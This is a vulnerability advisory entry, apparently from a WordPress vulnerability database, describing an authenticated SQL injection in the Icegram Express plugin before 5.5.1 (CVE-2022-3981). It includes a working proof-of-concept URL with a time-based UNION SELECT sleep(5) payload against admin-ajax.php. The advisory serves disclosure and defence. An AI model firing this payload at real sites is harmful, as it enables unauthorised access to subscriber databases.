Lucene search
Krzysztof ZajacWPEX-ID:78054D08-0227-426C-903D-D146E0919028HistoryNov 21, 2022 - 12:00 a.m.
Icegram Express < 5.5.1 - Subscriber+ SQLi
2022-11-2100:00:00
Krzysztof Zajac
165
icegram express
sql injection
subscriber+
security exploit
0.001 Low
EPSS
Percentile
33.6%
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscriber
Open the below URL when logged in as a subscriber and notice the 5s delay
https://example.com/wp-admin/admin-ajax.php?action=count_contacts_by_list&get_count=yes&list_id=1&conditions[]=3&status[]=\&status[]=)%20%20UNION%20SELECT%20sleep(5)%20UNION%20SELECT%20COUNT(DISTINCT%20subscribers.id)%20FROM%20wp_ig_contacts%20AS%20subscribers%20LEFT%20JOIN%20wp_ig_lists_contacts%20AS%20lists_subscribers%20ON%20subscribers.id%20=%20lists_subscribers.contact_id%20WHERE%201=1%20AND%20lists_subscribers.status%20IN(1)%20--%20gRelated
cve
cve
CVE-2022-3981
2022-12-12 18:15:12
openvas
openvas
WordPress Icegram Express Plugin < 5.5.1 SQLi Vulnerability
2023-10-23 00:00:00
nvd
nvd
CVE-2022-3981
2022-12-12 18:15:12
prion
prion
Sql injection
2022-12-12 18:15:00
cvelist
cvelist
CVE-2022-3981 Icegram Express < 5.5.1 - Subscriber+ SQLi
2022-12-12 17:54:44
wpvulndb
wpvulndb
Icegram Express < 5.5.1 - Subscriber+ SQLi
2022-11-21 00:00:00